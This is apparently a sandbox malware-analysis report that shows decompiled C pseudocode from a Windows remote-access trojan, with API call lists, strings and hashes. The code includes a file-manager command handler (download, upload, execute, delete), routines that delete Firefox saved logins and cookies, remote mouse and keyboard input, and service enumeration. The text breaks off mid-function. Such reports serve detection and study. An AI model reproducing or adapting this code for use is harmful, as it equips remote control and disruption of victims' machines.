                                            0x004049eb
                                            0x004049f6
                                            0x004049fb
                                            0x00404a08
                                            0x00404a11
                                            0x00404a1b
                                            0x00404a1e
                                            0x00404a20
                                            0x0040501e
                                            0x0040501e
                                            0x00405024
                                            0x00405208
                                            0x00405217
                                            0x00405221
                                            0x00405223
                                            0x00405239
                                            0x00405225
                                            0x0040522c
                                            0x0040522c
                                            0x0040523f
                                            0x00405248
                                            0x0040524a
                                            0x00405271
                                            0x00405276
                                            0x0040527b
                                            0x00405282
                                            0x0040528f
                                            0x00405294
                                            0x00405297
                                            0x0040529f
                                            0x004052a4
                                            0x004052a7
                                            0x004052a9
                                            0x0040524c
                                            0x00405250
                                            0x00405255
                                            0x00405258
                                            0x00405260
                                            0x00405265
                                            0x00405268
                                            0x0040526a
                                            0x0040526a
                                            0x004052ae
                                            0x004052b3
                                            0x004052b8
                                            0x004052bf
                                            0x004052d4
                                            0x004052d6
                                            0x004052db
                                            0x004052dd
                                            0x00405333
                                            0x00405337
                                            0x0040533c
                                            0x00405340
                                            0x0040534c
                                            0x00405355
                                            0x00405362
                                            0x004052df
                                            0x004052ea
                                            0x004052f0
                                            0x004052f5
                                            0x00405309
                                            0x00405312
                                            0x00405326
                                            0x0040532b
                                            0x0040532b
                                            0x00000000
                                            0x00405330
                                            0x004052dd
                                            0x0040502a
                                            0x0040502a
                                            0x0040502d
                                            0x00405107
                                            0x00405123
                                            0x0040513f
                                            0x00405159
                                            0x00405169
                                            0x00405178
                                            0x0040517a
                                            0x0040517f
                                            0x0040517f
                                            0x00405182
                                            0x004051c4
                                            0x004051ca
                                            0x004051d1
                                            0x004051da
                                            0x00405184
                                            0x00405192
                                            0x00405198
                                            0x0040519d
                                            0x004051e3
                                            0x00404c81
                                            0x00404c81
                                            0x00000000
                                            0x00404c81
                                            0x00405033
                                            0x00405033
                                            0x00405036
                                            0x00405093
                                            0x004050c2
                                            0x004050cc
                                            0x004050d7
                                            0x004050e6
                                            0x00000000
                                            0x004050e6
                                            0x00405038
                                            0x00405038
                                            0x0040503b
                                            0x00405053
                                            0x00405071
                                            0x00405071
                                            0x00000000
                                            0x0040503b
                                            0x00404a26
                                            0x00404d78
                                            0x00404d86
                                            0x00404d9c
                                            0x00404d9d
                                            0x00404d9e
                                            0x00404d9f
                                            0x00404da0
                                            0x00404dab
                                            0x00404db0
                                            0x00404db9
                                            0x00404dbd
                                            0x00404dfa
                                            0x00404e09
                                            0x00404e12
                                            0x00404e1b
                                            0x00404e24
                                            0x00404e41
                                            0x00404e4e
                                            0x00404e53
                                            0x00404e5e
                                            0x00404e63
                                            0x00404e6e
                                            0x00404e73
                                            0x00404e7f
                                            0x00404e88
                                            0x00404e99
                                            0x00404e9e
                                            0x00404ea4
                                            0x00404ed0
                                            0x00404ed5
                                            0x00404ed8
                                            0x00404eda
                                            0x00404fb6
                                            0x00404fd3
                                            0x00404fe2
                                            0x00404fe7
                                            0x00404ff3
                                            0x00404ffc
                                            0x00404ee0
                                            0x00404eef
                                            0x00404ef4
                                            0x00404eff
                                            0x00404f0e
                                            0x00404f13
                                            0x00404f1f
                                            0x00404f3a
                                            0x00404f57
                                            0x00404f62
                                            0x00404f67
                                            0x00404f73
                                            0x00404f7c
                                            0x00404f8b
                                            0x00404f90
                                            0x00404f99
                                            0x00404f99
                                            0x00405008
                                            0x00405014
                                            0x00404d20
                                            0x00404d24
                                            0x00000000
                                            0x00404d24
                                            0x00404a2c
                                            0x00404a2f
                                            0x00404d46
                                            0x00404d51
                                            0x00404d67
                                            0x00000000
                                            0x00404d6c
                                            0x00404a35
                                            0x00404a38
                                            0x00404c95
                                            0x00404ca9
                                            0x00404cc0
                                            0x00404cc6
                                            0x00404cd5
                                            0x00404cde
                                            0x00404cfc
                                            0x00404d09
                                            0x00404d12
                                            0x00404d1b
                                            0x00000000
                                            0x00404d1b
                                            0x00404a3e
                                            0x00404a41
                                            0x00404c0a
                                            0x00404c19
                                            0x00404c1e
                                            0x00404c2f
                                            0x00404c58
                                            0x00404c67
                                            0x00404c6c
                                            0x00404c78
                                            0x00000000
                                            0x00404c7d
                                            0x00404a47
                                            0x00404a4a
                                            0x00404b92
                                            0x00404bab
                                            0x00404bc9
                                            0x00404bd8
                                            0x00404bdd
                                            0x00404be9
                                            0x00000000
                                            0x00404a50
                                            0x00404a50
                                            0x00404a50
                                            0x00404a53
                                            0x00404a60
                                            0x00404a6b
                                            0x00404a70
                                            0x00404a76
                                            0x00404a81
                                            0x00404a86
                                            0x00404a8c
                                            0x00404a97
                                            0x00404a9c
                                            0x00404aa2
                                            0x00404ab8
                                            0x00404ac0
                                            0x00404ac9
                                            0x00404aca
                                            0x00404acc
                                            0x00404b1e
                                            0x00404b2b
                                            0x00404b30
                                            0x00404b3b
                                            0x00404b43
                                            0x00404b45
                                            0x00404ace
                                            0x00404adf
                                            0x00404aec
                                            0x00404af1
                                            0x00404afc
                                            0x00404b04
                                            0x00404b06
                                            0x00404b06
                                            0x00404b4a
                                            0x00404b4f
                                            0x00404b5b
                                            0x00404b64
                                            0x00404b70
                                            0x00404b70
                                            0x00000000
                                            0x00404a53

                                            APIs
                                            • SetEvent.KERNEL32(?,?), ref: 004049C2
                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00404BAB
                                              • Part of subcall function 004044C5: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00404510
                                              • Part of subcall function 004042FB: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00404354
                                              • Part of subcall function 004042FB: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040439C
                                              • Part of subcall function 004042FB: CloseHandle.KERNEL32(00000000), ref: 004043D6
                                              • Part of subcall function 004042FB: MoveFileW.KERNEL32(00000000,00000000), ref: 004043EE
                                              • Part of subcall function 00410B51: GetLocalTime.KERNEL32(00000000), ref: 00410B6B
                                              • Part of subcall function 00401790: send.WS2_32(?,00000000,00000000,00000000), ref: 00401804
                                              • Part of subcall function 0040590A: char_traits.LIBCPMT ref: 00405925
                                            • GetLogicalDriveStringsA.KERNEL32 ref: 00404C95
                                            • StrToIntA.SHLWAPI(00000000,?), ref: 00405053
                                            • CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 004050C2
                                              • Part of subcall function 004041E6: FindFirstFileW.KERNEL32(00000000,?), ref: 00404201
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: File$Create$CloseDirectoryDriveEventExecuteFindFirstHandleLocalLogicalMoveShellStringsTimeWritechar_traitssend
                                            • String ID: Browsing directory: $Deleted file: $Downloaded file size: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[DEBUG]$[ERROR]$[Info]$hF$open
                                            • API String ID: 4189642951-2142556888
                                            • Opcode ID: c41fcc337cc8f90d9a7373922aef218bd0a2180155614853824b098ac99f0793
                                            • Instruction ID: 6a90b5d1d80d7ed51860ed17606057358ce600790c4401c56cbdc9ff51e99be5
                                            • Opcode Fuzzy Hash: c41fcc337cc8f90d9a7373922aef218bd0a2180155614853824b098ac99f0793
                                            • Instruction Fuzzy Hash: 6832A4716147006BC604FB32CC679AF7769AF95309F40093FF542671E2EE7C9A08CA9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004074C9, Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 152fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E004074C9(void* __ebx, void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				struct _WIN32_FIND_DATAA _v468;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t73;
				signed int _t75;
				char* _t108;
				signed int _t109;
				char* _t129;
				void* _t130;
				void* _t135;
				void* _t136;
				void* _t137;
				void* _t138;

				_t143 = __eflags;
				_t135 = __edi;
				_t89 = __ebx;
				E004020CF(__ebx,  &_v100);
				E004020CF(__ebx,  &_v76);
				E004020CF(__ebx,  &_v28);
				_t45 = E0040207E(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401FA1( &_v28, _t46, _t136, E004059B8(_t89,  &_v52, E00430F6D(_t89, __eflags, "UserProfile"), _t135, _t143, _t45));
				E00401F97();
				E00401F97();
				_t137 = FindFirstFileA(E00401F2E(E0040594E( &_v124,  &_v28, _t143, "*")),  &_v468);
				E00401F97();
				if(_t137 != 0xffffffff) {
					while(1) {
						L15:
						_t57 = FindNextFileA(_t137,  &_v468);
						__eflags = _t57;
						if(_t57 == 0) {
							break;
						}
						__eflags = _v468.dwFileAttributes & 0x00000010;
						if((_v468.dwFileAttributes & 0x00000010) == 0) {
							continue;
						}
						_t108 =  &(_v468.cFileName);
						__eflags =  *_t108 - 0x2e;
						if( *_t108 != 0x2e) {
							L5:
							_t129 =  &(_v468.cFileName);
							_t109 = 0;
							__eflags = 0;
							while(1) {
								_t58 =  *(_t129 + _t109) & 0x000000ff;
								_t130 = "..";
								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
								_t129 =  &(_v468.cFileName);
								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
									break;
								}
								_t109 = _t109 + 1;
								__eflags = _t109 - 3;
								if(_t109 != 3) {
									continue;
								}
								_t59 = 0;
								L10:
								__eflags = _t59;
								if(__eflags != 0) {
									E00401FA1( &_v100, _t61, _t137, E00402973(_t89,  &_v52, E0040594E( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), __eflags, "\\logins.json"));
									E00401F97();
									E00401F97();
									E00401FA1( &_v76, _t67, _t137, E00402973(_t89,  &_v148, E0040594E( &_v52,  &_v28, __eflags,  &(_v468.cFileName)), __eflags, "\\key3.db"));
									E00401F97();
									E00401F97();
									_t73 = DeleteFileA(E00401F2E( &_v100));
									__eflags = _t73;
									if(_t73 == 0) {
										GetLastError();
									}
									_t75 = DeleteFileA(E00401F2E( &_v76));
									__eflags = _t75;
									if(_t75 == 0) {
										GetLastError();
									}
								}
								goto L15;
							}
							asm("sbb eax, eax");
							_t59 = _t58 | 0x00000001;
							__eflags = _t59;
							goto L10;
						}
						__eflags =  *(_t108 + 1) & 0x000000ff;
						if(( *(_t108 + 1) & 0x000000ff) == 0) {
							continue;
						}
						goto L5;
					}
					E0040207E(_t89, _t138 - 0x18, "\n[Firefox StoredLogins Cleared!]");
					E00407B4A();
					FindClose(_t137);
					goto L17;
				} else {
					FindClose(_t137);
					E0040207E(_t89, _t138 - 0x18, "\n[Firefox StoredLogins not found]");
					E00407B4A();
					L17:
					E00401F97();
					E00401F97();
					E00401F97();
					return 1;
				}
			}


























                                            0x004074c9
                                            0x004074c9
                                            0x004074c9
                                            0x004074d6
                                            0x004074de
                                            0x004074e6
                                            0x004074f3
                                            0x00407513
                                            0x0040751b
                                            0x00407523
                                            0x00407551
                                            0x00407553
                                            0x0040755b
                                            0x00407691
                                            0x00407691
                                            0x00407699
                                            0x0040769f
                                            0x004076a1
                                            0x00000000
                                            0x00000000
                                            0x00407584
                                            0x0040758b
                                            0x00000000
                                            0x00000000
                                            0x00407591
                                            0x00407597
                                            0x0040759a
                                            0x004075a8
                                            0x004075a8
                                            0x004075ae
                                            0x004075ae
                                            0x004075b0
                                            0x004075b0
                                            0x004075b4
                                            0x004075b9
                                            0x004075bc
                                            0x004075c2
                                            0x00000000
                                            0x00000000
                                            0x004075c4
                                            0x004075c5
                                            0x004075c8
                                            0x00000000
                                            0x00000000
                                            0x004075ca
                                            0x004075d3
                                            0x004075d3
                                            0x004075d5
                                            0x00407605
                                            0x0040760d
                                            0x00407618
                                            0x00407647
                                            0x00407652
                                            0x0040765a
                                            0x00407668
                                            0x0040766e
                                            0x00407670
                                            0x00407672
                                            0x00407672
                                            0x00407681
                                            0x00407687
                                            0x00407689
                                            0x0040768b
                                            0x0040768b
                                            0x00407689
                                            0x00000000
                                            0x004075d5
                                            0x004075ce
                                            0x004075d0
                                            0x004075d0
                                            0x00000000
                                            0x004075d0
                                            0x004075a0
                                            0x004075a2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004075a2
                                            0x004076b1
                                            0x004076b6
                                            0x004076bf
                                            0x00000000
                                            0x00407561
                                            0x00407562
                                            0x00407572
                                            0x00407577
                                            0x004076c5
                                            0x004076c8
                                            0x004076d0
                                            0x004076d8
                                            0x004076e3
                                            0x004076e3

                                            APIs
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 00407548
                                            • FindClose.KERNEL32(00000000), ref: 00407562
                                            • FindNextFileA.KERNEL32(00000000,?), ref: 00407699
                                            • FindClose.KERNEL32(00000000), ref: 004076BF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Find$CloseFile$FirstNext
                                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                            • API String ID: 1164774033-3681987949
                                            • Opcode ID: 3b3bdbc6a7b04b28283a9e23d02647eaee8827804e3d9b9ac0e3a36f2f4b9bfe
                                            • Instruction ID: f50e3c68682c1a5aa53a616703403141d89f32e42c3f74af52af7142d08e7849
                                            • Opcode Fuzzy Hash: 3b3bdbc6a7b04b28283a9e23d02647eaee8827804e3d9b9ac0e3a36f2f4b9bfe
                                            • Instruction Fuzzy Hash: CA517F3091461A9EDB14FB71CC56AFEB725AF12318F50017FE406B60E2EF782E49CA59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004076E4, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 143fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E004076E4(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				struct _WIN32_FIND_DATAA _v444;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				signed int _t47;
				int _t55;
				signed int _t56;
				signed int _t57;
				signed int _t65;
				long _t68;
				char* _t92;
				signed int _t93;
				void* _t102;
				char* _t105;
				void* _t106;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;

				_t117 = __eflags;
				_t109 = __edi;
				E004020CF(0,  &_v52);
				E004020CF(0,  &_v28);
				_t35 = E0040207E(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
				E00401FA1( &_v28, _t36, _t110, E004059B8(0,  &_v76, E00430F6D(0, __eflags, "UserProfile"), _t109, _t117, _t35));
				E00401F97();
				E00401F97();
				_t111 = FindFirstFileA(E00401F2E(E0040594E( &_v100,  &_v28, _t117, "*")),  &_v444);
				E00401F97();
				if(_t111 != 0xffffffff) {
					_t47 = FindNextFileA(_t111,  &_v444);
					__eflags = _t47;
					if(_t47 == 0) {
						L17:
						E0040207E(0, _t112 - 0x18, "\n[Firefox Cookies not found]");
						E00407B4A();
						FindClose(_t111);
						goto L18;
					} else {
						__eflags = 0;
						do {
							__eflags = _v444.dwFileAttributes & 0x00000010;
							if((_v444.dwFileAttributes & 0x00000010) == 0) {
								goto L16;
							} else {
								_t92 =  &(_v444.cFileName);
								__eflags =  *_t92 - 0x2e;
								if( *_t92 != 0x2e) {
									L8:
									_t105 =  &(_v444.cFileName);
									_t93 = 0;
									while(1) {
										_t56 =  *(_t105 + _t93) & 0x000000ff;
										_t106 = "..";
										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
										_t105 =  &(_v444.cFileName);
										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
											break;
										}
										_t93 = _t93 + 1;
										__eflags = _t93 - 3;
										if(_t93 != 3) {
											continue;
										} else {
											_t57 = 0;
										}
										L13:
										__eflags = _t57;
										if(__eflags == 0) {
											goto L16;
										} else {
											E00401FA1( &_v52, _t59, _t111, E00402973(0,  &_v76, E0040594E( &_v124,  &_v28, __eflags,  &(_v444.cFileName)), __eflags, "\\cookies.sqlite"));
											E00401F97();
											E00401F97();
											_t65 = DeleteFileA(E00401F2E( &_v52));
											__eflags = _t65;
											if(_t65 != 0) {
												_t102 = _t112 - 0x18;
												_push("\n[Firefox cookies found, cleared!]");
												goto L2;
											} else {
												_t68 = GetLastError();
												__eflags = _t68 != 0;
												if(_t68 != 0) {
													FindClose(_t111);
												} else {
													goto L16;
												}
											}
										}
										goto L19;
									}
									asm("sbb eax, eax");
									_t57 = _t56 | 0x00000001;
									__eflags = _t57;
									goto L13;
								} else {
									__eflags =  *(_t92 + 1) & 0x000000ff;
									if(( *(_t92 + 1) & 0x000000ff) == 0) {
										goto L16;
									} else {
										goto L8;
									}
								}
							}
							goto L19;
							L16:
							_t55 = FindNextFileA(_t111,  &_v444);
							__eflags = _t55;
						} while (_t55 != 0);
						goto L17;
					}
				} else {
					FindClose(_t111);
					_t102 = _t112 - 0x18;
					_push("\n[Firefox Cookies not found]");
					L2:
					E0040207E(0, _t102);
					E00407B4A();
					L18:
				}
				L19:
				E00401F97();
				E00401F97();
				return 1;
			}




























                                            0x004076e4
                                            0x004076e4
                                            0x004076f2
                                            0x004076fa
                                            0x00407707
                                            0x00407727
                                            0x0040772f
                                            0x00407737
                                            0x00407765
                                            0x00407767
                                            0x0040776f
                                            0x0040779c
                                            0x004077a2
                                            0x004077a4
                                            0x00407870
                                            0x0040787a
                                            0x0040787f
                                            0x00407888
                                            0x00000000
                                            0x004077aa
                                            0x004077aa
                                            0x004077ac
                                            0x004077ac
                                            0x004077b3
                                            0x00000000
                                            0x004077b9
                                            0x004077b9
                                            0x004077bf
                                            0x004077c2
                                            0x004077d0
                                            0x004077d0
                                            0x004077d6
                                            0x004077d8
                                            0x004077d8
                                            0x004077dc
                                            0x004077e1
                                            0x004077e4
                                            0x004077ea
                                            0x00000000
                                            0x00000000
                                            0x004077ec
                                            0x004077ed
                                            0x004077f0
                                            0x00000000
                                            0x004077f2
                                            0x004077f2
                                            0x004077f2
                                            0x004077fb
                                            0x004077fb
                                            0x004077fd
                                            0x00000000
                                            0x004077ff
                                            0x00407826
                                            0x0040782e
                                            0x00407836
                                            0x00407844
                                            0x0040784a
                                            0x0040784c
                                            0x004078b4
                                            0x004078b6
                                            0x00000000
                                            0x0040784e
                                            0x0040784e
                                            0x00407855
                                            0x00407858
                                            0x004078a9
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00407858
                                            0x0040784c
                                            0x00000000
                                            0x004077fd
                                            0x004077f6
                                            0x004077f8
                                            0x004077f8
                                            0x00000000
                                            0x004077c4
                                            0x004077c8
                                            0x004077ca
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004077ca
                                            0x004077c2
                                            0x00000000
                                            0x0040785a
                                            0x00407862
                                            0x00407868
                                            0x00407868
                                            0x00000000
                                            0x004077ac
                                            0x00407771
                                            0x00407772
                                            0x0040777b
                                            0x0040777d
                                            0x00407782
                                            0x00407782
                                            0x00407787
                                            0x0040788e
                                            0x0040788e
                                            0x00407890
                                            0x00407893
                                            0x0040789b
                                            0x004078a7

                                            APIs
                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040775C
                                            • FindClose.KERNEL32(00000000), ref: 00407772
                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040779C
                                            • DeleteFileA.KERNEL32(00000000,00000000), ref: 00407844
                                            • GetLastError.KERNEL32 ref: 0040784E
                                            • FindNextFileA.KERNEL32(00000000,00000010), ref: 00407862
                                            • FindClose.KERNEL32(00000000), ref: 00407888
                                            • FindClose.KERNEL32(00000000), ref: 004078A9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$Close$Next$DeleteErrorFirstLast
                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                            • API String ID: 532992503-432212279
                                            • Opcode ID: 174b1a9a43a05f0d0617f04e1e3f12d015b6b2ecfdc79a54686c0dd04394571d
                                            • Instruction ID: 6b33aa8495f862410eedbd41fc7c2ccf515ccb5456218501ac840ad7b4a4a989
                                            • Opcode Fuzzy Hash: 174b1a9a43a05f0d0617f04e1e3f12d015b6b2ecfdc79a54686c0dd04394571d
                                            • Instruction Fuzzy Hash: 7C418131D0421A9ADB14F761CC5A9FE7B29AF12308F50417FE401B31D2EF786E49CA9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0040F733, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 173COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 86%
                                            			E0040F733(signed int __edx, void* __eflags, char _a8) {
				void* _v28;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				intOrPtr* _t60;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t74;
				char* _t79;
				char* _t80;
				char* _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				intOrPtr _t90;
				signed int _t101;
				signed int _t109;
				signed int _t118;
				signed int _t136;

				_t136 = __edx;
				_t90 =  *((intOrPtr*)(E00401F33(0)));
				E00401F0C( &_a8,  &_v32, 1, 0xffffffff);
				if(_t90 != 0x30) {
					__eflags = _t90 - 0x31;
					if(_t90 != 0x31) {
						__eflags = _t90 - 0x32;
						if(_t90 != 0x32) {
							__eflags = _t90 - 0x33;
							if(_t90 != 0x33) {
								__eflags = _t90 - 0x34;
								if(_t90 != 0x34) {
									__eflags = _t90 - 0x35;
									if(_t90 != 0x35) {
										__eflags = _t90 - 0x36;
										if(_t90 == 0x36) {
											_push(0);
											_push(0x78);
											goto L15;
										}
									} else {
										_push(0);
										_push(0xffffff88);
										L15:
										mouse_event(0x800, 0, 0, ??, ??);
									}
								} else {
									_v40 =  *((intOrPtr*)(E00401F33(0)));
									_t60 = E00401F33(4);
									_t101 =  *0x460cf4; // 0x0
									_v40 =  *_t60;
									E0040F5D0( *((intOrPtr*)(0x460cf8 + _t101 * 4)),  &_v44, __eflags,  &_v40);
									E0040F9FF(_v44, _v40);
								}
							} else {
								_t65 = E00401F33(0);
								_v44 =  *((intOrPtr*)(E00401F33(4)));
								_t67 = E00401F33(8);
								_t109 =  *0x460cf4; // 0x0
								_v44 =  *_t67;
								E0040F5D0( *((intOrPtr*)(0x460cf8 + _t109 * 4)),  &_v48, __eflags,  &_v44);
								E0040F9A3( *_t65, _v48, _v44);
								goto L8;
							}
						} else {
							_t72 = E00401F33(0);
							_v40 =  *((intOrPtr*)(E00401F33(4)));
							_t74 = E00401F33(8);
							_t118 =  *0x460cf4; // 0x0
							_v48 =  *_t74;
							E0040F5D0( *((intOrPtr*)(0x460cf8 + _t118 * 4)),  &_v44, __eflags,  &_v48);
							E0040F947( *_t72, _v44, _v48);
							goto L8;
						}
					} else {
						_t79 = E00401F33(4);
						_t80 = E00401F33(3);
						_t81 = E00401F33(2);
						_t82 = E00401F33(0);
						 *_t79 =  *_t80;
						__eflags =  *_t81;
						E0040FA37( *_t82, __edx & 0xffffff00 |  *_t81 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0 |  *_t80 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0x000000ff);
						goto L8;
					}
				} else {
					E00401F33(0);
					_t85 = E00401F33(1);
					E0040ED58( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E00401F33(2)));
					L8:
				}
				E00401F97();
				return E00401F97();
			}
























                                            0x0040f733
                                            0x0040f751
                                            0x0040f758
                                            0x0040f760
                                            0x0040f79f
                                            0x0040f7a2
                                            0x0040f7fe
                                            0x0040f801
                                            0x0040f85e
                                            0x0040f861
                                            0x0040f8bf
                                            0x0040f8c2
                                            0x0040f910
                                            0x0040f913
                                            0x0040f91a
                                            0x0040f91d
                                            0x0040f91f
                                            0x0040f920
                                            0x00000000
                                            0x0040f920
                                            0x0040f915
                                            0x0040f915
                                            0x0040f916
                                            0x0040f922
                                            0x0040f929
                                            0x0040f929
                                            0x0040f8c4
                                            0x0040f8d6
                                            0x0040f8da
                                            0x0040f8df
                                            0x0040f8f2
                                            0x0040f8fb
                                            0x0040f909
                                            0x0040f909
                                            0x0040f863
                                            0x0040f868
                                            0x0040f87e
                                            0x0040f886
                                            0x0040f88b
                                            0x0040f89e
                                            0x0040f8a7
                                            0x0040f8b7
                                            0x00000000
                                            0x0040f8b7
                                            0x0040f803
                                            0x0040f808
                                            0x0040f81e
                                            0x0040f826
                                            0x0040f82b
                                            0x0040f83e
                                            0x0040f847
                                            0x0040f857
                                            0x00000000
                                            0x0040f857
                                            0x0040f7a4
                                            0x0040f7aa
                                            0x0040f7b7
                                            0x0040f7c4
                                            0x0040f7d1
                                            0x0040f7dc
                                            0x0040f7e6
                                            0x0040f7f3
                                            0x00000000
                                            0x0040f7f8
                                            0x0040f762
                                            0x0040f767
                                            0x0040f774
                                            0x0040f795
                                            0x0040f8bc
                                            0x0040f8bc
                                            0x0040f933
                                            0x0040f946

                                            APIs
                                            • StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 0040F787
                                            • mouse_event.USER32 ref: 0040F929
                                              • Part of subcall function 0040F5D0: GetSystemMetrics.USER32 ref: 0040F605
                                              • Part of subcall function 0040F5D0: GetSystemMetrics.USER32 ref: 0040F61A
                                              • Part of subcall function 0040F9FF: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 0040FA2B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: MetricsSystem$InputSendmouse_event
                                            • String ID: 0$1$2$3$4$5$6
                                            • API String ID: 1731092567-2737206560
                                            • Opcode ID: 549873fa973ad0ea399f733ee168efe249685c21f8b0745f876383a768f593ab
                                            • Instruction ID: d18d621259b11e623a0f015910d714c471def2de6af5f408401126faffa3cb2a
                                            • Opcode Fuzzy Hash: 549873fa973ad0ea399f733ee168efe249685c21f8b0745f876383a768f593ab
                                            • Instruction Fuzzy Hash: 645100B05183029FD314EF21E851BAB73A4AF95314F00493EF592672E1EB789A0DC79B
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0041004D, Relevance: 15.2, APIs: 10, Instructions: 226serviceCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 94%
                                            			E0041004D(intOrPtr __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				struct _QUERY_SERVICE_CONFIG* _v24;
				void* _v28;
				intOrPtr _v32;
				short** _v36;
				intOrPtr _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				struct _ENUM_SERVICE_STATUS _v172;
				void* __ebx;
				void* __edi;
				struct _ENUM_SERVICE_STATUS* _t87;
				void* _t100;
				void* _t107;
				int _t108;
				long _t110;
				void* _t133;
				intOrPtr _t198;
				short** _t199;
				int _t201;
				intOrPtr _t202;
				int _t203;

				_t198 = __ecx;
				_v40 = __ecx;
				_t133 = OpenSCManagerA(0, 0, 4);
				if(_t133 != 0) {
					E00405BA4(_t133,  &_v88);
					_v12 = 0;
					_v8 = 0;
					_v20 = 0;
					__eflags = EnumServicesStatusW(_t133, 0x3b, 3,  &_v172, 0,  &_v12,  &_v8,  &_v20);
					if(__eflags != 0) {
						L12:
						CloseServiceHandle(_t133);
						E00405441(_t133, _t198, __eflags,  &_v88);
						E004031D1();
						L13:
						return _t198;
					}
					__eflags = GetLastError() - 0xea;
					if(__eflags != 0) {
						goto L12;
					}
					_t201 = _v12;
